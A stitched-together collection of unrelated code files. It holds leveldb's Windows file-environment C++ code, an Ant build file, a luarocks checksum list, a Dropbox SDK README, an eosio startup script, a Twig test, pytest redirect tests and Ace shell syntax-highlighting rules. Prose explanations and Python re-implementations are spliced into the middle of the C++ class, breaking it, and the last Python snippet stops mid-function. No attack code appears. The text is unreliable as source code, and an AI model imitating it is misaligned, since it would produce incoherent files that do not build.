Status Read(uint64_t offset, size_t n, Slice* result,
char* scratch) const override {
if (offset + n > length_) {
*result = Slice();
return WindowsError(filename_, ERROR_INVALID_PARAMETER);
}
*result = Slice(mmap_base_ + offset, n);
return Status::OK();
}
private:
char* const mmap_base_;
const size_t length_;
Limiter* const mmap_limiter_;
const std::string filename_;
};
class WindowsWritableFile : public WritableFile {
public:
WindowsWritableFile(std::string filename, ScopedHandle handle)
: pos_(0), handle_(std::move(handle)), filename_(std::move(filename)) {}
~WindowsWritableFile() override = default;
Status Append(const Slice& data) override {
size_t write_size = data.size();
const char* write_data = data.data();
// Fit as much as possible into buffer.
size_t copy_size = std::min(write_size, kWritableFileBufferSize - pos_);
std::memcpy(buf_ + pos_, write_data, copy_size);
write_data += copy_size;
write_size -= copy_size;
pos_ += copy_size;
if (write_size == 0) {
return Status::OK();
}
// Can't fit in buffer, so need to do at least one write.
Status status = FlushBuffer();
if (!status.ok()) {
return status;
}
// Small writes go to buffer, large writes are written directly.
if (write_size < kWritableFileBufferSize) {
std::memcpy(buf_, write_data, write_size);
pos_ = write_size;
return Status::OK();
}
return WriteUnbuffered(write_data, write_size);
}
Status Close() override {
Status status = FlushBuffer();
if (!handle_.Close() && status.ok()) {
status = WindowsError(filename_, ::GetLastError());
}
return status;
}
Status Flush() override { return FlushBuffer(); }
Status Sync() override {
// On Windows no need to sync parent directory. Its metadata will be updated
// via the creation of the new file, without an explicit sync.
Status status = FlushBuffer();
if (!status.ok()) {
return status;
}
if (!::FlushFileBuffers(handle_.get())) {
return Status::IOError(filename_,
GetWindowsErrorMessage(::GetLastError()));
}
return Status::OK();
}
private:
Status FlushBuffer() {
Status status = WriteUnbuffered(buf_, pos_);
pos_ = 0;
return status;
}
Status WriteUnbuffered(const char* data, size_t size) {
DWORD bytes_written;
if (!::WriteFile(handle_.get(), data, static_cast<DWORD>(size),
&bytes_written, nullptr)) {
return Status::IOError(filename_,
GetWindowsErrorMessage(::GetLastError()));
}
return Status::OK();
}
// buf_[0, pos_-1] contains data to be written to handle_.
char buf_[kWritableFileBufferSize];
size_t pos_;
ScopedHandle handle_;
const std::string filename_;
};
// Lock or unlock the entire file as specified by |lock|. Returns true
// when successful, false upon failure. Caller should call ::GetLastError()
// to determine the cause of failure.
bool LockOrUnlock(HANDLE handle, bool lock) {
if (lock) {
return ::LockFile(handle,
/*dwFileOffsetLow=*/0, /*dwFileOffsetHigh=*/0,
/*nNumberOfBytesToLockLow=*/MAXDWORD,
/*nNumberOfBytesToLockHigh=*/MAXDWORD);
} else {
return ::UnlockFile(handle,
/*dwFileOffsetLow=*/0, /*dwFileOffsetHigh=*/0,
/*nNumberOfBytesToLockLow=*/MAXDWORD,
/*nNumberOfBytesToLockHigh=*/MAXDWORD);
}
}
class WindowsFileLock : public FileLock {
public:
WindowsFileLock(ScopedHandle handle, std::string filename)
: handle_(std::move(handle)), filename_(std::move(filename)) {}
const ScopedHandle& handle() const { return handle_; }
const std::string& filename() const { return filename_; }
private:
const ScopedHandle handle_;
const std::string filename_;
};
class WindowsEnv : public Env {
public:
WindowsEnv();
~WindowsEnv() override {
static const char msg[] =
"WindowsEnv singleton destroyed. Unsupported behavior!\n";
std::fwrite(msg, 1, sizeof(msg), stderr);
std::abort();
}
Status NewSequentialFile(const std::string& filename,
SequentialFile** result) override {
*result = nullptr;
DWORD desired_access = GENERIC_READ;
DWORD share_mode = FILE_SHARE_READ;
ScopedHandle handle = ::CreateFileA(
filename.c_str(), desired_access, share_mode,
/*lpSecurityAttributes=*/nullptr, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,
/*hTemplateFile=*/nullptr);
if (!handle.is_valid()) {
return WindowsError(filename, ::GetLastError());
}
*result = new WindowsSequentialFile(filename, std::move(handle));
return Status::OK();
}
Status NewRandomAccessFile(const std::string& filename,
RandomAccessFile** result) override {
*result = nullptr;
DWORD desired_access = GENERIC_READ;
DWORD share_mode = FILE_SHARE_READ;
ScopedHandle handle =
::CreateFileA(filename.c_str(), desired_access, share_mode,
/*lpSecurityAttributes=*/nullptr, OPEN_EXISTING,
FILE_ATTRIBUTE_READONLY,
/*hTemplateFile=*/nullptr);
if (!handle.is_valid()) {
return WindowsError(filename, ::GetLastError());
}
if (!mmap_limiter_.Acquire()) {
*result = new WindowsRandomAccessFile(filename, std::move(handle));
return Status::OK();
}
LARGE_INTEGER file_size;
if (!::GetFileSizeEx(handle.get(), &file_size)) {
mmap_limiter_.Release();
return WindowsError(filename, ::GetLastError());
}
ScopedHandle mapping =
::CreateFileMappingA(handle.get(),
/*security attributes=*/nullptr, PAGE_READONLY,
/*dwMaximumSizeHigh=*/0,
/*dwMaximumSizeLow=*/0,
/*lpName=*/nullptr);
if (mapping.is_valid()) {
void* mmap_base = ::MapViewOfFile(mapping.get(), FILE_MAP_READ,
/*dwFileOffsetHigh=*/0,
/*dwFileOffsetLow=*/0,
/*dwNumberOfBytesToMap=*/0);
if (mmap_base) {
*result = new WindowsMmapReadableFile(
filename, reinterpret_cast<char*>(mmap_base),
static_cast<size_t>(file_size.QuadPart), &mmap_limiter_);
return Status::OK();
}
}
mmap_limiter_.Release();
return WindowsError(filename, ::GetLastError());
}
Status NewWritableFile(const std::string& filename,
WritableFile** result) override {
DWORD desired_access = GENERIC_WRITE;
DWORD share_mode = 0; // Exclusive access.
ScopedHandle handle = ::CreateFileA(
filename.c_str(), desired_access, share_mode,
/*lpSecurityAttributes=*/nullptr, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL,
/*hTemplateFile=*/nullptr);
if (!handle.is_valid()) {
*result = nullptr;
return WindowsError(filename, ::GetLastError());
}
*result = new WindowsWritableFile(filename, std::move(handle));
return Status::OK();
}
Status NewAppendableFile(const std::string& filename,
WritableFile** result) override {
DWORD desired_access = FILE_APPEND_DATA;
DWORD share_mode = 0; // Exclusive access.
ScopedHandle handle = ::CreateFileA(
filename.c_str(), desired_access, share_mode,
/*lpSecurityAttributes=*/nullptr, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL,
/*hTemplateFile=*/nullptr);
if (!handle.is_valid()) {
*result = nullptr;
return WindowsError(filename, ::GetLastError());
}
*result = new WindowsWritableFile(filename, std::move(handle));
return Status::OK();
}
bool FileExists(const std::string& filename) override {
return ::GetFileAttributesA(filename.c_str()) != INVALID_FILE_ATTRIBUTES;
}
Status GetChildren(const std::string& directory_path,
std::vector<std::string>* result) override {
const std::string find_pattern = directory_path + "\\*";
WIN32_FIND_DATAA find_data;
HANDLE dir_handle = ::FindFirstFileA(find_pattern.c_str(), &find_data);
if (dir_handle == INVALID_HANDLE_VALUE) {
DWORD last_error = ::GetLastError();
if (last_error == ERROR_FILE_NOT_FOUND) {
return Status::OK();
}
return WindowsError(directory_path, last_error);
}
do {
char base_name[_MAX_FNAME];
char ext[_MAX_EXT];
if (!_splitpath_s(find_data.cFileName, nullptr, 0, nullptr, 0, base_name,
ARRAYSIZE(base_name), ext, ARRAYSIZE(ext))) {
result->emplace_back(std::string(base_name) + ext);
}
} while (::FindNextFileA(dir_handle, &find_data));
DWORD last_error = ::GetLastError();
::FindClose(dir_handle);
if (last_error != ERROR_NO_MORE_FILES) {
return WindowsError(directory_path, last_error);
}
return Status::OK();
}
Status RemoveFile(const std::string& filename) override {
if (!::DeleteFileA(filename.c_str())) {
return WindowsError(filename, ::GetLastError());
}
return Status::OK();
}
Status CreateDir(const std::string& dirname) override {
if (!::CreateDirectoryA(dirname.c_str(), nullptr)) {
return WindowsError(dirname, ::GetLastError());
}
return Status::OK();
}
Status RemoveDir(const std::string& dirname) override {
if (!::RemoveDirectoryA(dirname.c_str())) {
return WindowsError(dirname, ::GetLastError());
}
return Status::OK();
}
Status GetFileSize(const std::string& filename, uint64_t* size) override {
WIN32_FILE_ATTRIBUTE_DATA file_attributes;
if (!::GetFileAttributesExA(filename.c_str(), GetFileExInfoStandard,
&file_attributes)) {
return WindowsError(filename, ::GetLastError());
}
ULARGE_INTEGER file_size;
file_size.HighPart = file_attributes.nFileSizeHigh;
file_size.LowPart = file_attributes.nFileSizeLow;
*size = file_size.QuadPart;
return Status::OK();
}
Status RenameFile(const std::string& from, const std::string& to) override {
// Try a simple move first. It will only succeed when |to| doesn't already
// exist.
if (::MoveFileA(from.c_str(), to.c_str())) {
return Status::OK();
}
DWORD move_error = ::GetLastError();
// Try the full-blown replace if the move fails, as ReplaceFile will only
// succeed when |to| does exist. When writing to a network share, we may not
// be able to change the ACLs; ignore ACL errors in that case
// (REPLACEFILE_IGNORE_MERGE_ERRORS).
if (::ReplaceFileA(to.c_str(), from.c_str(), /*lpBackupFileName=*/nullptr,
REPLACEFILE_IGNORE_MERGE_ERRORS,
/*lpExclude=*/nullptr, /*lpReserved=*/nullptr)) {
return Status::OK();
}
DWORD replace_error = ::GetLastError();
// If ReplaceFile fails with ERROR_FILE_NOT_FOUND or ERROR_PATH_NOT_FOUND, it
// is likely that |to| does not exist. In this case, the more relevant error
// comes from the call to MoveFile.
if (replace_error == ERROR_FILE_NOT_FOUND ||
replace_error == ERROR_PATH_NOT_FOUND) {
return WindowsError(from, move_error);
} else {
return WindowsError(from, replace_error);
}
}
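RenameFile tries a plain move first, then a replace; when the replace fails because |to| never existed, the error from the original move is the meaningful one to report. That selection logic, isolated in Python (the two constants are the real Win32 values; everything else is illustrative):

```python
ERROR_FILE_NOT_FOUND = 2
ERROR_PATH_NOT_FOUND = 3

def pick_rename_error(move_error: int, replace_error: int) -> int:
    """Choose the more relevant of the two failure codes, as RenameFile does."""
    if replace_error in (ERROR_FILE_NOT_FOUND, ERROR_PATH_NOT_FOUND):
        # ReplaceFile failed because |to| does not exist; the move's
        # error explains the real problem.
        return move_error
    return replace_error
```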
Status LockFile(const std::string& filename, FileLock** lock) override {
*lock = nullptr;
Status result;
ScopedHandle handle = ::CreateFileA(
filename.c_str(), GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ,
/*lpSecurityAttributes=*/nullptr, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL,
nullptr);
if (!handle.is_valid()) {
result = WindowsError(filename, ::GetLastError());
} else if (!LockOrUnlock(handle.get(), true)) {
result = WindowsError("lock " + filename, ::GetLastError());
} else {
*lock = new WindowsFileLock(std::move(handle), filename);
}
return result;
}
Status UnlockFile(FileLock* lock) override {
WindowsFileLock* windows_file_lock =
reinterpret_cast<WindowsFileLock*>(lock);
if (!LockOrUnlock(windows_file_lock->handle().get(), false)) {
return WindowsError("unlock " + windows_file_lock->filename(),
::GetLastError());
}
delete windows_file_lock;
return Status::OK();
}
void Schedule(void (*background_work_function)(void* background_work_arg),
void* background_work_arg) override;
void StartThread(void (*thread_main)(void* thread_main_arg),
void* thread_main_arg) override {
std::thread new_thread(thread_main, thread_main_arg);
new_thread.detach();
}
Status GetTestDirectory(std::string* result) override {
const char* env = getenv("TEST_TMPDIR");
if (env && env[0] != '\0') {
*result = env;
return Status::OK();
}
char tmp_path[MAX_PATH];
if (!::GetTempPathA(ARRAYSIZE(tmp_path), tmp_path)) {
return WindowsError("GetTempPath", ::GetLastError());
}
std::stringstream ss;
ss << tmp_path << "leveldbtest-" << std::this_thread::get_id();
*result = ss.str();
// Directory may already exist
CreateDir(*result);
return Status::OK();
}
Status NewLogger(const std::string& filename, Logger** result) override {
std::FILE* fp = std::fopen(filename.c_str(), "w");
if (fp == nullptr) {
*result = nullptr;
return WindowsError(filename, ::GetLastError());
} else {
*result = new WindowsLogger(fp);
return Status::OK();
}
}
uint64_t NowMicros() override {
// GetSystemTimeAsFileTime typically has a resolution of 10-20 msec.
// TODO(cmumford): Switch to GetSystemTimePreciseAsFileTime which is
// available in Windows 8 and later.
FILETIME ft;
::GetSystemTimeAsFileTime(&ft);
// Each tick represents a 100-nanosecond interval since January 1, 1601
// (UTC).
uint64_t num_ticks =
(static_cast<uint64_t>(ft.dwHighDateTime) << 32) + ft.dwLowDateTime;
return num_ticks / 10;
}
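NowMicros joins FILETIME's two 32-bit words into a count of 100-nanosecond ticks since 1601-01-01 UTC, then divides by 10 to get microseconds. The arithmetic in isolation:

```python
def filetime_to_micros(high: int, low: int) -> int:
    """FILETIME (100 ns ticks since 1601-01-01 UTC) -> microseconds."""
    ticks = (high << 32) + low
    return ticks // 10
```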
void SleepForMicroseconds(int micros) override {
std::this_thread::sleep_for(std::chrono::microseconds(micros));
}
private:
void BackgroundThreadMain();
static void BackgroundThreadEntryPoint(WindowsEnv* env) {
env->BackgroundThreadMain();
}
// Stores the work item data in a Schedule() call.
//
// Instances are constructed on the thread calling Schedule() and used on the
// background thread.
//
// This structure is thread-safe because it is immutable.
struct BackgroundWorkItem {
explicit BackgroundWorkItem(void (*function)(void* arg), void* arg)
: function(function), arg(arg) {}
void (*const function)(void*);
void* const arg;
};
port::Mutex background_work_mutex_;
port::CondVar background_work_cv_ GUARDED_BY(background_work_mutex_);
bool started_background_thread_ GUARDED_BY(background_work_mutex_);
std::queue<BackgroundWorkItem> background_work_queue_
GUARDED_BY(background_work_mutex_);
Limiter mmap_limiter_; // Thread-safe.
};
// Return the maximum number of concurrent mmaps.
int MaxMmaps() { return g_mmap_limit; }
WindowsEnv::WindowsEnv()
: background_work_cv_(&background_work_mutex_),
started_background_thread_(false),
mmap_limiter_(MaxMmaps()) {}
void WindowsEnv::Schedule(
void (*background_work_function)(void* background_work_arg),
void* background_work_arg) {
background_work_mutex_.Lock();
// Start the background thread, if we haven't done so already.
if (!started_background_thread_) {
started_background_thread_ = true;
std::thread background_thread(WindowsEnv::BackgroundThreadEntryPoint, this);
background_thread.detach();
}
// If the queue is empty, the background thread may be waiting for work.
if (background_work_queue_.empty()) {
background_work_cv_.Signal();
}
background_work_queue_.emplace(background_work_function, background_work_arg);
background_work_mutex_.Unlock();
}
void WindowsEnv::BackgroundThreadMain() {
while (true) {
background_work_mutex_.Lock();
// Wait until there is work to be done.
while (background_work_queue_.empty()) {
background_work_cv_.Wait();
}
assert(!background_work_queue_.empty());
auto background_work_function = background_work_queue_.front().function;
void* background_work_arg = background_work_queue_.front().arg;
background_work_queue_.pop();
background_work_mutex_.Unlock();
background_work_function(background_work_arg);
}
}
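Schedule lazily starts one detached background thread on first use and signals the condition variable only when the queue transitions from empty; the worker loops forever, waiting while the queue is empty and running each work item outside the lock. A compact Python analogue of that structure (illustrative, not leveldb's API):

```python
import threading
from collections import deque

class BackgroundRunner:
    def __init__(self):
        self._mu = threading.Lock()
        self._cv = threading.Condition(self._mu)
        self._queue = deque()
        self._started = False

    def schedule(self, fn, arg):
        with self._mu:
            if not self._started:         # start the worker on first use
                self._started = True
                threading.Thread(target=self._run, daemon=True).start()
            if not self._queue:           # worker may be waiting for work
                self._cv.notify()
            self._queue.append((fn, arg))

    def _run(self):
        while True:
            with self._mu:
                while not self._queue:
                    self._cv.wait()
                fn, arg = self._queue.popleft()
            fn(arg)                       # run the work item outside the lock
```

As in the C++ code, signaling only on the empty-to-non-empty transition avoids redundant wakeups, and dropping the lock before invoking the callback keeps long-running work from blocking producers.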
// Wraps an Env instance whose destructor is never run.
//
// Intended usage:
// using PlatformSingletonEnv = SingletonEnv<PlatformEnv>;
// void ConfigurePosixEnv(int param) {
// PlatformSingletonEnv::AssertEnvNotInitialized();
// // set global configuration flags.
// }
// Env* Env::Default() {
// static PlatformSingletonEnv default_env;
// return default_env.env();
// }
template <typename EnvType>
class SingletonEnv {
public:
SingletonEnv() {
#if !defined(NDEBUG)
env_initialized_.store(true, std::memory_order::memory_order_relaxed);
#endif // !defined(NDEBUG)
static_assert(sizeof(env_storage_) >= sizeof(EnvType),
"env_storage_ will not fit the Env");
static_assert(alignof(decltype(env_storage_)) >= alignof(EnvType),
"env_storage_ does not meet the Env's alignment needs");
new (&env_storage_) EnvType();
}
~SingletonEnv() = default;
SingletonEnv(const SingletonEnv&) = delete;
SingletonEnv& operator=(const SingletonEnv&) = delete;
Env* env() { return reinterpret_cast<Env*>(&env_storage_); }
static void AssertEnvNotInitialized() {
#if !defined(NDEBUG)
assert(!env_initialized_.load(std::memory_order::memory_order_relaxed));
#endif // !defined(NDEBUG)
}
private:
typename std::aligned_storage<sizeof(EnvType), alignof(EnvType)>::type
env_storage_;
#if !defined(NDEBUG)
static std::atomic<bool> env_initialized_;
#endif // !defined(NDEBUG)
};
#if !defined(NDEBUG)
template <typename EnvType>
std::atomic<bool> SingletonEnv<EnvType>::env_initialized_;
#endif // !defined(NDEBUG)
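SingletonEnv placement-news the Env into static storage and defaults its own destructor, so the singleton is never destroyed during shutdown; a debug-only flag lets helpers like AssertEnvNotInitialized verify that global configuration happens before first use. The same "configure before first use" guard sketched in Python (names illustrative):

```python
class SingletonEnv:
    _instance = None

    @classmethod
    def env(cls):
        # Created on first use; never torn down afterwards.
        if cls._instance is None:
            cls._instance = cls()
        return cls._instance

    @classmethod
    def assert_not_initialized(cls):
        # Mirrors AssertEnvNotInitialized: configuration must precede
        # the first env() call.
        assert cls._instance is None, "env already initialized"
```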
using WindowsDefaultEnv = SingletonEnv<WindowsEnv>;
} // namespace
void EnvWindowsTestHelper::SetReadOnlyMMapLimit(int limit) {
WindowsDefaultEnv::AssertEnvNotInitialized();
g_mmap_limit = limit;
}
Env* Env::Default() {
static WindowsDefaultEnv env_container;
return env_container.env();
}
} // namespace leveldb
<?xml version="1.0" encoding="UTF-8"?>
<!--
Copyright (c) 2011, Oracle and/or its affiliates. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name of Oracle nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-->
<project name="TransparentRuler" basedir="." default="jar">
<import file="nbproject/jdk.xml"/>
<target name="-prop-init">
<property file="user.build.properties"/>
<property file="build.properties"/>
</target>
<target name="-init" depends="-prop-init,-jdk-init"/>
<target name="compile" depends="-init" description="Compile main sources.">
<mkdir dir="${classes.dir}"/>
<javac srcdir="${src.dir}" destdir="${classes.dir}" debug="${debug}" deprecation="${deprecation}">
<classpath path="${cp}"/>
</javac>
<copy todir="${classes.dir}">
<fileset dir="${src.dir}"/>
</copy>
</target>
<target name="jar" depends="compile" description="Build JAR file for main sources.">
<jar jarfile="${jar}" compress="true">
<manifest>
<attribute name="Main-Class" value="${main.class}"/>
</manifest>
<fileset dir="${classes.dir}"/>
</jar>
</target>
<target name="run" depends="compile" description="Run application.">
<fail unless="main.class">Must set property 'main.class' (e.g. in build.properties)</fail>
<java classname="${main.class}" fork="true" failonerror="true">
<classpath path="${run.cp}"/>
</java>
</target>
<target name="javadoc" depends="-init" description="Build Javadoc.">
<mkdir dir="${javadoc.dir}"/>
<javadoc destdir="${javadoc.dir}">
<classpath path="${cp}"/>
<sourcepath>
<pathelement location="${src.dir}"/>
</sourcepath>
<fileset dir="${src.dir}"/>
</javadoc>
</target>
<target name="clean" depends="-init" description="Clean build products.">
<delete dir="${build.dir}"/>
<delete file="${jar}"/>
</target>
<target name="profile">
<ant antfile="nbproject/netbeans-targets.xml" target="profile"/>
</target>
</project>
# computed by luarocks/buildroot
sha256 01211bb80dab92f87cece6e31854d73ae4a2ce06af7c48423a54313d72adf9fb wsapi-xavante-1.7-1.src.rock
sha256 6aa14e3febf7a9e810ce672b015f5a5514241ce5d1c3a6a48f921f089d270159 wsapi/doc/us/license.html
sha256 c7bf3061d00a96d10cb9dbc3a737d0af22594e2ef8f788842d7ab92eeaa864f2 wsapi/doc/us/license.md
# Dropbox JavaScript SDK Examples
To run the examples in your development environment:
1. Clone this repo
2. Run `npm install`
3. From the root of your repository, start the development server with
`npm start`.
4. Point your browser to <http://0.0.0.0:8080/>
## Code flow example
1. Clone this repo
2. Run `npm install`
3. Create an app in the [App console](https://www.dropbox.com/developers/apps).
4. Set a redirect URI "http://localhost:3000/auth" on the app's page on the [App
console](https://www.dropbox.com/developers/apps).
5. Set app key and secret in `examples/javascript/code_flow_example.js` on lines
17 and 18.
6. Run `node examples/javascript/code_flow_example.js`
7. Point your browser to <http://0.0.0.0:3000/>
echo "Starting eosiodev service ..."
if [ "$(ls -A "$DATA_DIR")" ]; then
  /opt/eosio/bin/nodeos --config-dir "$CONFIG_DIR" --data-dir "$DATA_DIR" -e --hard-replay
else
  /opt/eosio/bin/nodeos --config-dir "$CONFIG_DIR" --data-dir "$DATA_DIR" -e #--delete-all-blocks
fi
--TEST--
"set" tag block capture
--TEMPLATE--
{% set foo %}f<br />o<br />o{% endset %}
{{ foo }}
--DATA--
return []
--EXPECT--
f<br />o<br />o
import pytest
from utils.urls import assert_valid_url
from .map_301 import (
DEFAULT_SAMPLES_URLS,
FIREFOX_ACCOUNTS_URLS,
GITHUB_IO_URLS,
LEGACY_URLS,
MARIONETTE_URLS,
MOZILLADEMOS_URLS,
REDIRECT_URLS,
SCL3_REDIRECT_URLS,
WEBEXT_URLS,
ZONE_REDIRECT_URLS,
)
# while these test methods are similar, they're each testing a
# subset of redirects, and it was easier to work with them separately.
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", REDIRECT_URLS, ids=[item["url"] for item in REDIRECT_URLS]
)
def test_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", GITHUB_IO_URLS, ids=[item["url"] for item in GITHUB_IO_URLS]
)
def test_github_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", MOZILLADEMOS_URLS, ids=[item["url"] for item in MOZILLADEMOS_URLS]
)
def test_mozillademos_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", DEFAULT_SAMPLES_URLS, ids=[item["url"] for item in DEFAULT_SAMPLES_URLS]
)
def test_default_samples_redirects(url, base_url, media_url):
url["base_url"] = base_url
url["location"] = f"{media_url}{url['url']}"
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize("url", LEGACY_URLS, ids=[item["url"] for item in LEGACY_URLS])
def test_legacy_urls(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", SCL3_REDIRECT_URLS, ids=[item["url"] for item in SCL3_REDIRECT_URLS]
)
def test_scl3_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", ZONE_REDIRECT_URLS, ids=[item["url"] for item in ZONE_REDIRECT_URLS]
)
def test_zone_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", MARIONETTE_URLS, ids=[item["url"] for item in MARIONETTE_URLS]
)
def test_marionette_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize("url", WEBEXT_URLS, ids=[item["url"] for item in WEBEXT_URLS])
def test_webext_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
@pytest.mark.headless
@pytest.mark.nondestructive
@pytest.mark.parametrize(
"url", FIREFOX_ACCOUNTS_URLS, ids=[item["url"] for item in FIREFOX_ACCOUNTS_URLS]
)
def test_firefox_accounts_redirects(url, base_url):
url["base_url"] = base_url
assert_valid_url(**url)
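Each parametrize call above derives human-readable test ids from the "url" key of the redirect dicts, and each test body injects the fixture's base_url before validating. That per-test setup pattern, isolated (the data and function names here are illustrative):

```python
REDIRECT_URLS = [
    {"url": "/en-US/docs", "status_code": 301},
    {"url": "/samples", "status_code": 302},
]

def make_params(urls, base_url):
    """Mirror the test setup: ids come from 'url', base_url is injected."""
    ids = [item["url"] for item in urls]
    params = [dict(item, base_url=base_url) for item in urls]
    return ids, params
```

Unlike the in-place mutation in the tests above, `dict(item, base_url=...)` leaves the source list untouched, which matters if the same data is reused across parametrizations.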
ace.define("ace/mode/sh_highlight_rules",["require","exports","module","ace/lib/oop","ace/mode/text_highlight_rules"], function(require, exports, module) {
"use strict";
var oop = require("../lib/oop");
var TextHighlightRules = require("./text_highlight_rules").TextHighlightRules;
var reservedKeywords = exports.reservedKeywords = (
'!|{|}|case|do|done|elif|else|'+
'esac|fi|for|if|in|then|until|while|'+
'&|;|export|local|read|typeset|unset|'+
'elif|select|set'
);
var languageConstructs = exports.languageConstructs = (
'[|]|alias|bg|bind|break|builtin|'+
'cd|command|compgen|complete|continue|'+
'dirs|disown|echo|enable|eval|exec|'+
'exit|fc|fg|getopts|hash|help|history|'+
'jobs|kill|let|logout|popd|printf|pushd|'+
'pwd|return|set|shift|shopt|source|'+
'suspend|test|times|trap|type|ulimit|'+
'umask|unalias|wait'
);
var ShHighlightRules = function() {
var keywordMapper = this.createKeywordMapper({
"keyword": reservedKeywords,
"support.function.builtin": languageConstructs,
"invalid.deprecated": "debugger"
}, "identifier");
var integer = "(?:(?:[1-9]\\d*)|(?:0))";
var fraction = "(?:\\.\\d+)";
var intPart = "(?:\\d+)";
var pointFloat = "(?:(?:" + intPart + "?" + fraction + ")|(?:" + intPart + "\\.))";
var exponentFloat = "(?:(?:" + pointFloat + "|" + intPart + ")" + ")";
var floatNumber = "(?:" + exponentFloat + "|" + pointFloat + ")";
var fileDescriptor = "(?:&" + intPart + ")";
var variableName = "[a-zA-Z_][a-zA-Z0-9_]*";
var variable = "(?:(?:\\$" + variableName + ")|(?:" + variableName + "=))";
var builtinVariable = "(?:\\$(?:SHLVL|\\$|\\!|\\?))";
var func = "(?:" + variableName + "\\s*\\(\\))";
this.$rules = {
"start" : [{
token : "constant",
regex : /\\./
}, {
token : ["text", "comment"],
regex : /(^|\s)(#.*)$/
}, {
token : "string",
regex : '"',
push : [{
token : "constant.language.escape",
regex : /\\(?:[$abeEfnrtv\\'"]|x[a-fA-F\d]{1,2}|u[a-fA-F\d]{4}([a-fA-F\d]{4})?|c.|\d{1,3})/
}, {
token : "constant",
regex : /\$\w+/
}, {
token : "string",
regex : '"',
next: "pop"
}, {
defaultToken: "string"
}]
}, {
regex : "<<<",
token : "keyword.operator"
}, {
stateName: "heredoc",
regex : "(<<-?)(\\s*)(['\"`]?)([\\w\\-]+)(['\"`]?)",
onMatch : function(value, currentState, stack) {
var next = value[2] == '-' ? "indentedHeredoc" : "heredoc";
var tokens = value.split(this.splitRegex);
stack.push(next, tokens[4]);
return [
{type:"constant", value: tokens[1]},
{type:"text", value: tokens[2]},
{type:"string", value: tokens[3]},
{type:"support.class", value: tokens[4]},
{type:"string", value: tokens[5]}
];
},
rules: {
heredoc: [{
onMatch: function(value, currentState, stack) {
if (value === stack[1]) {
stack.shift();
stack.shift();
this.next = stack[0] || "start";
return "support.class";
}
this.next = "";
return "string";
},
regex: ".*$",
next: "start"
}],
indentedHeredoc: [{
token: "string",
regex: "^\t+"
}, {
onMatch: function(value, currentState, stack) {
if (value === stack[1]) {
stack.shift();
stack.shift();
this.next = stack[0] || "start";
return "support.class";
}
this.next = "";
return "string";
},
regex: ".*$",
next: "start"
}]
}
}, {
regex : "$",
token : "empty",
next : function(currentState, stack) {
if (stack[0] === "heredoc" || stack[0] === "indentedHeredoc")
return stack[0];
return currentState;
}
}, {
token : "variable.language",
regex : builtinVariable
}, {
token : "variable",
regex : variable
}, {
token : "support.function",
regex : func
}, {
token : "support.function",
regex : fileDescriptor
}, {
token : "string", // ' string
start : "'", end : "'"
}, {
token : "constant.numeric", // float
regex : floatNumber
}, {
token : "constant.numeric", // integer
regex : integer + "\\b"
}, {
token : keywordMapper,
regex : "[a-zA-Z_][a-zA-Z0-9_]*\\b"
}, {
token : "keyword.operator",
regex : "\\+|\\-|\\*|\\*\\*|\\/|\\/\\/|~|<|>|<=|=>|=|!="
}, {
token : "paren.lparen",
regex : "[\\[\\(\\{]"
}, {
token : "paren.rparen",
regex : "[\\]\\)\\}]"
} ]
};
this.normalizeRules();
};
oop.inherits(ShHighlightRules, TextHighlightRules);
exports.ShHighlightRules = ShHighlightRules;
});
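The heredoc rules above push the delimiter word onto the tokenizer stack, then compare each subsequent line against it (stripping leading tabs first in the `<<-` indented form) until the terminator is found. The same scanning idea sketched in Python (function and parameter names are illustrative):

```python
def scan_heredoc(lines, delimiter, indented=False):
    """Return (body, rest): lines up to the delimiter, then the remainder."""
    body = []
    for i, line in enumerate(lines):
        # The <<- form allows the terminator to be tab-indented.
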